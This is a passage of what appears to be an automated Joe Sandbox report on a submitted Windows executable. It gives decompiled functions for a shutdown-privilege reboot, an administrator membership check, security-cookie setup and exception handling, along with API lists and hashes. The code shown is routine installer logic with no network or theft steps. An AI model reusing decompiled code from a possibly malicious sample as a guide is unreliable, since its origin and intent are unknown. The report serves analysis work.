                                                                                                                                                                                                                                      0x00405eab
                                                                                                                                                                                                                                      0x00405eab
                                                                                                                                                                                                                                      0x00405eae
                                                                                                                                                                                                                                      0x00405ed4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405eb0
                                                                                                                                                                                                                                      0x00405eb1
                                                                                                                                                                                                                                      0x00405eb4
                                                                                                                                                                                                                                      0x00405ec8
                                                                                                                                                                                                                                      0x00405eb6
                                                                                                                                                                                                                                      0x00405eb9
                                                                                                                                                                                                                                      0x00405ebf
                                                                                                                                                                                                                                      0x00405ef8
                                                                                                                                                                                                                                      0x00405ef8
                                                                                                                                                                                                                                      0x00405ebb
                                                                                                                                                                                                                                      0x00405ebb
                                                                                                                                                                                                                                      0x00405ebb
                                                                                                                                                                                                                                      0x00405eb9
                                                                                                                                                                                                                                      0x00405eb4
                                                                                                                                                                                                                                      0x00405eae
                                                                                                                                                                                                                                      0x00405ea9
                                                                                                                                                                                                                                      0x00405ea4
                                                                                                                                                                                                                                      0x00405efe
                                                                                                                                                                                                                                      0x00405f00
                                                                                                                                                                                                                                      0x00405f02
                                                                                                                                                                                                                                      0x00405f06
                                                                                                                                                                                                                                      0x00405e86
                                                                                                                                                                                                                                      0x00405e54
                                                                                                                                                                                                                                      0x00405e56
                                                                                                                                                                                                                                      0x00405e61
                                                                                                                                                                                                                                      0x00405e61
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e2b
                                                                                                                                                                                                                                      0x00405e2f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e35
                                                                                                                                                                                                                                      0x00405e35
                                                                                                                                                                                                                                      0x00405e35
                                                                                                                                                                                                                                      0x00405e37
                                                                                                                                                                                                                                      0x00405e37
                                                                                                                                                                                                                                      0x00405e40
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e46
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405e46
                                                                                                                                                                                                                                      0x00405e40
                                                                                                                                                                                                                                      0x00405e2f
                                                                                                                                                                                                                                      0x00405e29
                                                                                                                                                                                                                                      0x00405e20
                                                                                                                                                                                                                                      0x00405e17
                                                                                                                                                                                                                                      0x00405e0e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d82
                                                                                                                                                                                                                                      0x00405d82
                                                                                                                                                                                                                                      0x00405d82
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405d82
                                                                                                                                                                                                                                      0x00405d80
                                                                                                                                                                                                                                      0x00405d7c
                                                                                                                                                                                                                                      0x00405d6c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405cb2
                                                                                                                                                                                                                                      0x00405d8b
                                                                                                                                                                                                                                      0x00405db6
                                                                                                                                                                                                                                      0x004061b0
                                                                                                                                                                                                                                      0x00405dbc
                                                                                                                                                                                                                                      0x00405dbe
                                                                                                                                                                                                                                      0x00405dc9
                                                                                                                                                                                                                                      0x00405dc9
                                                                                                                                                                                                                                      0x00405db6
                                                                                                                                                                                                                                      0x004061b2
                                                                                                                                                                                                                                      0x004061b2
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 00405CA0
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00408B3E,00000104,00000000,?,?), ref: 00405DAE
                                                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00405DF0
                                                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 00405E93
                                                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00405F21
                                                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 00405F59
                                                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 00405FBA
                                                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 0040605C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00401140,00000000,00000040,00000000), ref: 004061A3
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004061AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                      • Opcode ID: 78ab5dddc703b5709fbc105216a7a49425d72b4de12bb8ed5d4903e2ec36cbd5
                                                                                                                                                                                                                                      • Instruction ID: 7041a7123f9e432c400f55f32cea5b47fd9fc07569ee61eb8b625c955a2ee893
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78ab5dddc703b5709fbc105216a7a49425d72b4de12bb8ed5d4903e2ec36cbd5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BD10371A04A554ADF358B388D483BB3BA5EB16304F1840BBD4C6F66D1DA7C8E828F4D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                                                                                                      			E00401F9B(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                                                      						if( *0x409a40 != 0) {
                                                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                                                      							_t13 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								E00404495(0, _t37);
                                                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                                                      							return E00406C80(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                                                      						_t28 = E00404495(0, 0x522, 0x401140, 0, 0x40, 4);
                                                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					__eax = E00401EC1();
                                                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}

















                                                                                                                                                                                                                                      0x00401f9b
                                                                                                                                                                                                                                      0x00401f9b
                                                                                                                                                                                                                                      0x00401f9e
                                                                                                                                                                                                                                      0x00401fa3
                                                                                                                                                                                                                                      0x00401faf
                                                                                                                                                                                                                                      0x00401fb2
                                                                                                                                                                                                                                      0x00401fd0
                                                                                                                                                                                                                                      0x00401fd8
                                                                                                                                                                                                                                      0x00401fe6
                                                                                                                                                                                                                                      0x00401ef2
                                                                                                                                                                                                                                      0x00401ef7
                                                                                                                                                                                                                                      0x00401efe
                                                                                                                                                                                                                                      0x00401f01
                                                                                                                                                                                                                                      0x00401f19
                                                                                                                                                                                                                                      0x00401f3b
                                                                                                                                                                                                                                      0x00401f47
                                                                                                                                                                                                                                      0x00401f53
                                                                                                                                                                                                                                      0x00401f5a
                                                                                                                                                                                                                                      0x00401f65
                                                                                                                                                                                                                                      0x00401f6d
                                                                                                                                                                                                                                      0x00401f6e
                                                                                                                                                                                                                                      0x00401f6f
                                                                                                                                                                                                                                      0x00401f82
                                                                                                                                                                                                                                      0x00401f8d
                                                                                                                                                                                                                                      0x00401f84
                                                                                                                                                                                                                                      0x00401f84
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401f84
                                                                                                                                                                                                                                      0x00401f71
                                                                                                                                                                                                                                      0x00401f71
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401f71
                                                                                                                                                                                                                                      0x00401f1b
                                                                                                                                                                                                                                      0x00401f1b
                                                                                                                                                                                                                                      0x00401f20
                                                                                                                                                                                                                                      0x00401f20
                                                                                                                                                                                                                                      0x00401f21
                                                                                                                                                                                                                                      0x00401f21
                                                                                                                                                                                                                                      0x00401f23
                                                                                                                                                                                                                                      0x00401f24
                                                                                                                                                                                                                                      0x00401f27
                                                                                                                                                                                                                                      0x00401f2c
                                                                                                                                                                                                                                      0x00401f2c
                                                                                                                                                                                                                                      0x00401f93
                                                                                                                                                                                                                                      0x00401f9a
                                                                                                                                                                                                                                      0x00401fda
                                                                                                                                                                                                                                      0x00401fde
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401fde
                                                                                                                                                                                                                                      0x00401fb4
                                                                                                                                                                                                                                      0x00401fbf
                                                                                                                                                                                                                                      0x00401fc6
                                                                                                                                                                                                                                      0x00401fce
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401fce
                                                                                                                                                                                                                                      0x00401fa5
                                                                                                                                                                                                                                      0x00401fa5
                                                                                                                                                                                                                                      0x00401fad
                                                                                                                                                                                                                                      0x00401fe4
                                                                                                                                                                                                                                      0x00401fe5
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401fad

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00401F08
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00401F0F
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00401FDE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                      • Opcode ID: ef8e8afff19964273b4b609f02582893faaa2b1b486ef335d05f7f084abcdc60
                                                                                                                                                                                                                                      • Instruction ID: 0eace80c61266d87c3a7a6edad0d6346b4ec87f8986dd6301948562e51bd1264
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef8e8afff19964273b4b609f02582893faaa2b1b486ef335d05f7f084abcdc60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C218671A402056BDB209BA19D4AFBF76B9DB85754F20003AFB02F61D1D7788841966E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                                                      			E0040180E(intOrPtr* __ecx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t14 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                                                      							 *0x40a288(0, _v24, _v28);
                                                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                      			}



















                                                                                                                                                                                                                                      0x00401816
                                                                                                                                                                                                                                      0x0040181d
                                                                                                                                                                                                                                      0x00401825
                                                                                                                                                                                                                                      0x0040182b
                                                                                                                                                                                                                                      0x0040182d
                                                                                                                                                                                                                                      0x00401835
                                                                                                                                                                                                                                      0x00401838
                                                                                                                                                                                                                                      0x00401840
                                                                                                                                                                                                                                      0x00401844
                                                                                                                                                                                                                                      0x0040184c
                                                                                                                                                                                                                                      0x00401852
                                                                                                                                                                                                                                      0x00401857
                                                                                                                                                                                                                                      0x00401871
                                                                                                                                                                                                                                      0x00401874
                                                                                                                                                                                                                                      0x0040187d
                                                                                                                                                                                                                                      0x00401882
                                                                                                                                                                                                                                      0x0040188c
                                                                                                                                                                                                                                      0x00401892
                                                                                                                                                                                                                                      0x00401897
                                                                                                                                                                                                                                      0x0040189e
                                                                                                                                                                                                                                      0x0040189e
                                                                                                                                                                                                                                      0x004018a3
                                                                                                                                                                                                                                      0x004018a3
                                                                                                                                                                                                                                      0x0040187d
                                                                                                                                                                                                                                      0x004018aa
                                                                                                                                                                                                                                      0x004018aa
                                                                                                                                                                                                                                      0x004018c0

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018FB), ref: 0040183A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040184C
                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(004018FB,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018FB), ref: 00401875
                                                                                                                                                                                                                                      • FreeSid.ADVAPI32(?,?,?,?,004018FB), ref: 004018A3
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,004018FB), ref: 004018AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                      • Opcode ID: 9ddc0eaee48e11b276caeb22cf19941d1c374f87d1014e2ede0017bf97d9411e
                                                                                                                                                                                                                                      • Instruction ID: 443502d5072c1c9741e8ca34b9f47f76e932065339906d4eaf2131785f0e16e6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ddc0eaee48e11b276caeb22cf19941d1c374f87d1014e2ede0017bf97d9411e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6116A71E00309AFE7109FA4DD49ABF7778EF44704F50413AF901F2290DA749D048759
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00407105() {
                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                      				_t23 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0x408004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					 *0x408004 = _t39;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                                                      				 *0x408008 = _t37;
                                                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                      0x0040710d
                                                                                                                                                                                                                                      0x00407111
                                                                                                                                                                                                                                      0x00407115
                                                                                                                                                                                                                                      0x00407128
                                                                                                                                                                                                                                      0x00407132
                                                                                                                                                                                                                                      0x0040713e
                                                                                                                                                                                                                                      0x00407147
                                                                                                                                                                                                                                      0x00407150
                                                                                                                                                                                                                                      0x00407161
                                                                                                                                                                                                                                      0x00407168
                                                                                                                                                                                                                                      0x00407174
                                                                                                                                                                                                                                      0x00407177
                                                                                                                                                                                                                                      0x0040717b
                                                                                                                                                                                                                                      0x00407185
                                                                                                                                                                                                                                      0x0040718a
                                                                                                                                                                                                                                      0x0040718a
                                                                                                                                                                                                                                      0x0040718c
                                                                                                                                                                                                                                      0x0040718c
                                                                                                                                                                                                                                      0x00407192
                                                                                                                                                                                                                                      0x00407195
                                                                                                                                                                                                                                      0x0040719c

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407132
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00407141
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040714A
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00407153
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00407168
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                                                      • Opcode ID: 1d989e86c29576ac243875370393b67fbb0cbb90b5dce6f443c0c7e6da3451bf
                                                                                                                                                                                                                                      • Instruction ID: d2d317d084306dc58222dbb2bf5077ddcdb2c198e2dbb826be02e51f81b20231
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d989e86c29576ac243875370393b67fbb0cbb90b5dce6f443c0c7e6da3451bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90110671D01208EBCB10DBB8DB48A9EB7F5EF48314F65487AD502FB250EA349A148B49
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00406C90(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                      				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                      			}



                                                                                                                                                                                                                                      0x00406c97
                                                                                                                                                                                                                                      0x00406ca0
                                                                                                                                                                                                                                      0x00406cb9

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00406DC6,00401000), ref: 00406C97
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(00406DC6,?,00406DC6,00401000), ref: 00406CA0
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00406DC6,00401000), ref: 00406CAB
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00406DC6,00401000), ref: 00406CB2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                                      • Opcode ID: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
